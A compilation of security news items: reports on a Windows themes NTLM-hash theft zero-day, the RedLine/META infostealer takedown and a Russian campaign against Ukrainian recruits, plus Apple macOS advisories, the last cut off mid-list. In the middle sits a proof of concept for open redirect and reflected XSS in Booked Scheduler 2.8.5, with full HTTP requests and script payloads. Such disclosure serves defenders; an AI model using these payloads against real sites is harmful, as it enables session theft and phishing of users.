Now a zero-day, the vulnerability enables NTLM hash theft, an issue that Microsoft has already fixed twice before.

Source: tdhster via Shutterstock

All versions of Windows clients, from Windows 7 through current Windows 11 versions, contain a 0-day vulnerability that could allow attackers to capture NTLM authentication hashes from users of affected systems.

Researchers at ACROS Security reported the flaw to Microsoft this week. They discovered the issue while writing a patch for older Windows systems for CVE-2024-38030, a medium-severity Windows Themes spoofing vulnerability that Microsoft mitigated in its July security update.

**Variant of Two Previous Vulnerabilities**

The vulnerability that ACROS discovered is very similar to CVE-2024-38030 and enables what is known as an authentication coercion attack, where a vulnerable device is essentially coerced into sending NTLM hashes — the cryptographic representation of a user's password — to an attacker's system. Akamai researcher Tomer Peled discovered CVE-2024-38030 while analyzing Microsoft's fix for CVE-2024-21320, another, earlier Windows themes spoofing vulnerability he discovered and reported to Microsoft. The flaw that ACROS uncovered is a new, separate vulnerability related to the two flaws Peled reported earlier.

Windows themes files allow users to customize the appearance of their Windows desktop interface via wallpapers, screen savers, colors, and sounds. Both the vulnerabilities that Akamai researcher Peled discovered had to do with the manner in which the themes handled file paths to a couple of image resources, specifically "BrandImage" or "Wallpaper." Peled found that because of improper validation, an attacker could manipulate the legitimate path to these resources in such a way as to get Windows to automatically send an authenticated request, along with the user's NTLM hash, to the attacker's device.

As Peled explains to Dark Reading, "The themes file format is an .ini file, with multiple 'key,value' pairs. I originally found two key,value pairs that could accept file paths," he says.

The original vulnerability (CVE-2024-21320) stemmed from the fact that the key,value pairs accepted UNC paths — a standardized format for identifying network resources like shared files and folders — for network drives, Peled notes. "This \[meant\] that a weaponized theme file, with a UNC path, could trigger an outbound connection with user authentication, without them knowing." Microsoft fixed the issue by adding a check on the file path to ensure it wasn't a UNC path. But, Peled says, the function Microsoft used for this validation allowed for some bypasses, which is what led to Peled's discovery of the second vulnerability (CVE-2024-38030).

**Microsoft Will Act 'As Needed'**

What ACROS Security reported this week is the third Windows themes spoofing vulnerability rooted in the same file path issue. "Our researchers discovered the vulnerability in early October while writing a patch for CVE-2024-38030 intended for legacy Windows systems many of our users are still using," says Mitja Kolsek, CEO of ACROS Security. "We reported this issue to Microsoft \[on\] Oct. 28, 2024, but we did not release details or a proof-of-concept, which we plan to do after Microsoft has made their own patch publicly available."

A Microsoft spokesman said via email the company is aware of the ACROS report and "will take action as needed to help keep customers protected." The company does not appear to have issued a CVE, or vulnerability identifier, for the new issue yet.

Like the two previous Windows themes spoofing vulnerabilities that Akamai discovered, the new one that ACROS found also does not require an attacker to have any special privileges. "But they have to somehow get the user to copy a theme file to some other folder on their computer, then open that folder with Windows Explorer using a view that renders icons," Kolsek says. "The file could also be automatically downloaded to their Downloads folder while visiting \[an\] attacker's website, in which case the attacker would have to wait for the user to view the Downloads folder at a later time."

Kolsek recommends that organizations disable NTLM where possible, but acknowledges that doing so could cause functional problems if any network components rely on it. "\[An\] attacker could only successfully target a computer where NTLM is enabled," he says. "Another requirement is that a request initiated by a malicious theme file would be able to reach the attacker's server on the Internet or in an adjacent network," something that firewalls should typically block, he says. As a result, it's more likely than an attacker would try to exploit the flaw in a targeted campaign more so than in a mass exploit.

Akamai's Peled says it's hard to know what ACROS's vulnerability is about without having access to the technical details. "But it might be another UNC bypass that circumvents the check, or it could be a different key,value pair that was missed in the original patching," he says. "UNC path formats are very complex and allow for weird combinations, which make detecting them very hard. This might be why it's so complex to fix."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Recurring Windows Flaw Could Expose User Credentials

An international law enforcement operation, led by the United States, Europol, and the Netherlands, has successfully dismantled the…

An international law enforcement operation, led by the United States, Europol, and the Netherlands, has successfully dismantled the infrastructure behind the notorious RedLine and META infostealer malware. Discover how these cyberattacks steal sensitive information and the impact they have on individuals and businesses worldwide.

An international law enforcement operation has successfully dismantled the infrastructure behind two notorious infostealer malware strains: RedLine and Meta. The operation, codenamed “Operation Magnus,” was led by the Dutch National Police, the U.S. Department of Justice (DOJ) and supported by Europol.

The investigation involved law enforcement agencies from across the globe, including Belgium (Belgian Federal Police, Belgian Federal Prosecutor’s Office), Australia (the Australian Federal Police), Portugal (Polícia Judiciária), and the United Kingdom (National Crime Agency).

Other US agencies involved in this operation include the FBI, Naval Criminal Investigative Service, IRS Criminal Investigation, Defense Criminal Investigative Service, and Army Criminal Investigation Division. These agencies collaborated under a Joint Cybercrime Action Taskforce (“JCAT”) Operation Magnus. 

Watch the video released by authorities

This operation resulted in full access (PDF) to the servers hosting the malware’s infrastructure, including source code, license servers, user data, and seizing domains and Telegram accounts. Authorities have created a dedicated website to provide resources for victims and the public

For your information, Infostealers are a type of malware designed to steal sensitive information from victims’ devices, such as login credentials, passwords, and credit card details. These stolen credentials are often sold on underground markets, enabling further cyberattacks and fraudulent activities.

Screenshot from RedLine’s infrastructure

RedLine and META are designed to infiltrate victim computers and steal sensitive information. This stolen data, often referred to as “logs,” can include usernames, passwords, financial information, and even cryptocurrency wallet details. Criminals use these stolen credentials for a variety of nefarious purposes, including launching further attacks, committing fraud, or bypassing multi-factor authentication (MFA). 

Investigations revealed RedLine and META may have infected millions of computers worldwide. Estimates suggest RedLine alone might be one of the most prevalent malware variants globally. Law enforcement has identified millions of unique credentials stolen by the malware, including usernames, passwords, and financial data.

As part of Operation Magnus, authorities unsealed a criminal complaint (PDF) against Maxim Rudometov, believed to be a developer and administrator of RedLine. The complaint accuses Rudometov of managing RedLine’s infrastructure, receiving payments through cryptocurrency accounts, and possessing the malware itself. He faces charges including access device fraud, conspiracy to commit computer intrusion, and money laundering, and if convicted, he could face a maximum sentence of 10 years in prison.

Maxim Rudometov, the alleged developer and administrator of RedLine.

Operation Magnus serves as a powerful example of international cooperation in combating cybercrime. By dismantling the RedLine and META infrastructure, law enforcement has significantly disrupted the activities of cybercriminals who rely on stolen data for their illicit operations. However, the ever-evolving nature of cybercrime necessitates continued vigilance and cooperation between law enforcement and cybersecurity experts.

1.  **VirusTotal Reveals Apps Most Exploited To Spread Malware**
2.  **Konni RAT Exploiting Word Docs to Steal Data from Windows**
3.  **FBI Dismantles Chinese-Linked Botnet of 260,000 IoT Devices**
4.  **Police Dismantle Phishing-as-a-Service Platform BulletProftLink**
5.  **Arid Viper’s AridSpy Trojan Hits Android Users in Palestine, Egypt**

Operation Magnus: Police Dismantles RedLine and META Infostealer Infrastructure

Russian hackers launched a targeted malware campaign via Telegram, aimed at Ukrainian military recruits. Disguised as recruitment tools,…

Russian hackers launched a targeted malware campaign via Telegram, aimed at Ukrainian military recruits. Disguised as recruitment tools, the malware steals data and spreads disinformation, weakening Ukraine’s defence efforts.

A new report by Google’s Threat Intelligence Group (TAG) exposes a cyber campaign targeting Ukrainian men eligible for military service. The campaign, linked to Russian state-sponsored hackers, orchestrated by the UNC5812 group, utilizes a combination of malware and disinformation.

It is worth noting that at the beginning of October 2024, reports indicated that Russian cyber operations against Ukraine during the first half of the year shifted from broad-spectrum attacks to a more targeted approach, specifically focusing on Ukraine’s military and defence sectors.

For the latest campaign, the immediate objective is to compromise the devices of potential Ukrainian military recruits. Hackers are distributing malicious software to help Ukrainian military recruits locate recruitment centers. These programs are laced with malware that can steal sensitive information like browser data, keystrokes, and cryptocurrency wallet details. 

To achieve this, the attackers have established a deceptive online presence through a Telegram channel and website known as “Civil Defense.” Reportedly, the website was registered in April 2024, but the Telegram channel was created in September

These platforms entice users with promises of helpful information and tools related to military conscription. However, once victims download and install the offered software, they unwittingly expose their devices to various malware strains.

For Windows users, this typically involves the Pronsis Loader, which subsequently delivers the information-stealing PURESTEALER. Android users, on the other hand, are targeted with the CRAXSRAT backdoor, a versatile tool capable of data theft, surveillance, and remote control. 

To bypass security measures, the attackers have employed social engineering techniques, instructing victims to disable Google Play Protect and manually grant permissions to the malicious apps. The campaign also involves a concerted effort to spread disinformation and undermine public morale in Ukraine. 

The “Civil Defense” platform disseminates anti-mobilization narratives, promotes false information about the war, and encourages users to share videos of alleged unfair practices at recruitment centers. The website has a dedicated news section rife with fabricated stories depicting purported injustices surrounding mobilization. The content is posted on pro-Russian social media channels. 

The UNC5812 campaign is part of a broader pattern of Russian cyberattacks aimed at destabilizing Ukraine. By targeting potential recruits, the attackers seek to erode public support for the military and hinder Ukraine’s ability to defend itself. 

Researchers suspect that UNC5812 is purchasing promoted posts in Ukrainian-language channels to target potential victims. A channel with over 80,000 subscribers promoting the “Civil Defense” Telegram channel-website was observed on September 18th. An additional Ukrainian-language news channel promoting the posts as recently as October 8th suggests the campaign is actively seeking new Ukrainian-language communities for targeted engagement.

Civil Defense promoted in Ukrainian-language missile alert and news communities and Download page, translated from Ukrainian (Via Google)

Google has identified and blocked malicious websites and domains by adding them to Safe Browsing, actively scanning devices for harmful apps, and collaborating with Ukrainian authorities to block the campaign’s website within the country. Google Play Protect also actively scans devices for harmful apps, including those installed outside the Play Store.

Nevertheless, Google’s report sheds light on Russia’s multifaceted approach to weakening Ukraine’s war effort through cyber means. By staying informed and utilizing security measures provided by platforms like Google, users can help mitigate the impact of such campaigns.

1.  Russia Responsible for Widespread Power Outage in Ukraine?
2.  Ukraine Blocks Russian Industroyer 2 Attack on Energy Provider
3.  Hackers Claim Data Breach at Russian Cybersecurity Firm Dr.Web
4.  Russian APT29 Using NSO Group-Style Exploits in Attacks, Google
5.  Russian Midnight Blizzard Breached UK Home Office via Microsoft

Russian Malware Attack Targets Ukrainian Military Recruits via Telegram

Booked Scheduler version 2.8.5 suffers from cross site scripting and open redirection vulnerabilities.

    # Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5# Date: 10/2024# Exploit Author: Andrey Stoykov# Version: 2.8.5# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.htmlhttps://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.htmlOpen Redirect:Steps to Reproduce:1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP2. In the "resume" parameter add the redirect URL e.g. Burp Collab3. Forward the requestindex.php// HTTP POST login requestPOST /Bookedbo8effotfu/Web/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0[...]email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg// HTTP responseHTTP/1.1 302 FoundDate: Sat, 12 Oct 2024 12:09:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.comContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8Reflected XSS:reservation.php// HTTP GET requestGET/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;new_version=v%3D2.8.5%2Cfs%3D1728734988;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brDnt: 1Sec-Gpc: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 12 Oct 2024 12:23:55 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 14003<h5><ahref="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Returnto the last page that you were on</a></h5></div>schedule.php// HTTP GET requestGET/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;schedule_calendar_toggle=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 19 Oct 2024 09:12:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 7853<h5><ahref="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Returnto the last page that you were on

Booked Scheduler 2.8.5 Cross Site Scripting / Open Redirection

Apple Security Advisory 10-28-2024-5 - macOS Ventura 13.7.1 addresses bypass, information leakage, out of bounds access, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1

macOS Ventura 13.7.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121568.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: macOS Ventura  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44270: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-44280: Mickey Jin (@patch1t)

ARKit  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted file may lead to heap  
corruption  
Description: The issue was addressed with improved checks.  
CVE-2024-44126: Holger Fuhrmannek

Assets  
Available for: macOS Ventura  
Impact: A malicious app with root privileges may be able to modify the  
contents of system files  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-44260: Mickey Jin (@patch1t)

CoreServicesUIAgent  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-44295: an anonymous researcher

CoreText  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

CUPS  
Available for: macOS Ventura  
Impact: An attacker in a privileged network position may be able to leak  
sensitive user information  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2024-44213: Alexandre Bedard

DiskArbitration  
Available for: macOS Ventura  
Impact: A sandboxed app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-40855: Csaba Fitzl (@theevilbit) of Kandji

Find My  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44289: Kirin (@Pwnrin)

Foundation  
Available for: macOS Ventura  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Game Controllers  
Available for: macOS Ventura  
Impact: An attacker with physical access can input Game Controller  
events to apps running on a locked device  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2024-44265: Ronny Stiftel

ImageIO  
Available for: macOS Ventura  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

Installer  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2024-44216: Zhongquan Li (@Guluisacat)

Installer  
Available for: macOS Ventura  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44287: Mickey Jin (@patch1t)

IOGPUFamily  
Available for: macOS Ventura  
Impact: A malicious app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44197: Wang Yu of Cyberserval

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

LaunchServices  
Available for: macOS Ventura  
Impact: An application may be able to break out of its sandbox  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44122: an anonymous researcher

Maps  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44222: Kirin (@Pwnrin)

Messages  
Available for: macOS Ventura  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved input sanitization.  
CVE-2024-44256: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44156: Arsenii Kostromin (0x3c3e)  
CVE-2024-44159: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-44196: Csaba Fitzl (@theevilbit) of Kandji

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44253: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Kandji

PackageKit  
Available for: macOS Ventura  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44247: Un3xploitable of CW Research Inc  
CVE-2024-44267: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44301: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44275: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Ventura  
Impact: An attacker with root privileges may be able to delete protected  
system files  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44294: Mickey Jin (@patch1t)

Screen Capture  
Available for: macOS Ventura  
Impact: An attacker with physical access may be able to share items from  
the lock screen  
Description: The issue was addressed with improved checks.  
CVE-2024-44137: Halle Winkler, Politepix @hallewinkler

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: macOS Ventura  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

sips  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-44236: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44237: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Ventura  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-44284: Junsung Lee, dw0r! working with Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Ventura  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44279: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44281: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Ventura  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2024-44283: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Siri  
Available for: macOS Ventura  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

SystemMigration  
Available for: macOS Ventura  
Impact: A malicious app may be able to create symlinks to protected  
regions of the disk  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44264: Mickey Jin (@patch1t)

WindowServer  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44257: Bohdan Stasiuk (@Bohdan_Stasiuk)

Additional recognition

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Spotlight  
We would like to acknowledge Paulo Henrique Batista Rosa de Castro  
(@paulohbrc) for their assistance.

macOS Ventura 13.7.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAA8ACgkQX+5d1TXa  
IvrXBg/8DeQSQAigpeRoMRWyyfrezV21cUXKEUCAjoJhrdQmSg37fyGZNPeWsSxQ  
gGqvh8sGPaI6iKFpd2hY9a9CyJGnBmH0AwjeU0evvmqclrQaYEuHZosaR1yyiemt  
wjTAt9IvtaT0oLJ4ic+pdu4jXgc/pbzg25bwNbzG7S/pMFs/by7yAJt9duOGFkMC  
5FuLFdpASL1uZ3Mh3o1tIxexLV+UBv2duTdYhJSKDTvD9GDZ4KLKlcujt1XnF76o  
uu7TPx7mh6oZwTk/1nhZqkIlaJyJPKv7Qf+za6FfEjpw+jU8QNnQQFPIq2wc1qR3  
rzsbDubRoTPt0a59Q3z2sbDlRxk3Phuq6o58PJS+FcAEOqCSeChNIDDMoFvSKs7M  
MdxFHtyVDhUPyaJMyjnzpOTqxCn2yxbdgg1fgP5PiWeyK963zmpgnSmm/Rqrtj4Y  
Y0ObbeKn4MArTc+7vMSJb/f2WtsJPn5MufpUPNhXp2OTdXOVEoa+MIO+BDHc+32d  
AXnwXLWEec7FnSILyWTd+lApPKy4+ptn1asnDrhz1s3VuGC27mImtxh0kn9JUfFT  
kFXX9ct8G2AybkxOLMYmen5fb/33Ypbb1AJp7n0776d1qpomsIUdSkEJs7/CAIcb  
vWc21lLZdoaYfd7KmL/9Y/n0S5AihmqXmsDQKQ4+lrxJmU4xww0=  
=cN79  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-5

Apple Security Advisory 10-28-2024-4 - macOS Sonoma 14.7.1 addresses buffer overflow, bypass, information leakage, out of bounds access, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1

macOS Sonoma 14.7.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121570.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: macOS Sonoma  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

AppleMobileFileIntegrity  
Available for: macOS Sonoma  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44270: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-44280: Mickey Jin (@patch1t)

Assets  
Available for: macOS Sonoma  
Impact: A malicious app with root privileges may be able to modify the  
contents of system files  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-44260: Mickey Jin (@patch1t)

CoreMedia Playback  
Available for: macOS Sonoma  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreServicesUIAgent  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-44295: an anonymous researcher

CoreText  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

CUPS  
Available for: macOS Sonoma  
Impact: An attacker in a privileged network position may be able to leak  
sensitive user information  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2024-44213: Alexandre Bedard

DiskArbitration  
Available for: macOS Sonoma  
Impact: A sandboxed app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-40855: Csaba Fitzl (@theevilbit) of Kandji

Find My  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44289: Kirin (@Pwnrin)

Foundation  
Available for: macOS Sonoma  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Game Controllers  
Available for: macOS Sonoma  
Impact: An attacker with physical access can input Game Controller  
events to apps running on a locked device  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2024-44265: Ronny Stiftel

ImageIO  
Available for: macOS Sonoma  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

Installer  
Available for: macOS Sonoma  
Impact: An app may be able to access user-sensitive data  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2024-44216: Zhongquan Li (@Guluisacat)

Installer  
Available for: macOS Sonoma  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44287: Mickey Jin (@patch1t)

IOGPUFamily  
Available for: macOS Sonoma  
Impact: A malicious app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44197: Wang Yu of Cyberserval

Kernel  
Available for: macOS Sonoma  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Kernel  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44175: Csaba Fitzl (@theevilbit) of Kandji

LaunchServices  
Available for: macOS Sonoma  
Impact: An application may be able to break out of its sandbox  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44122: an anonymous researcher

Maps  
Available for: macOS Sonoma  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44222: Kirin (@Pwnrin)

Messages  
Available for: macOS Sonoma  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved input sanitization.  
CVE-2024-44256: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to bypass Privacy preferences  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44159: Mickey Jin (@patch1t)  
CVE-2024-44156: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
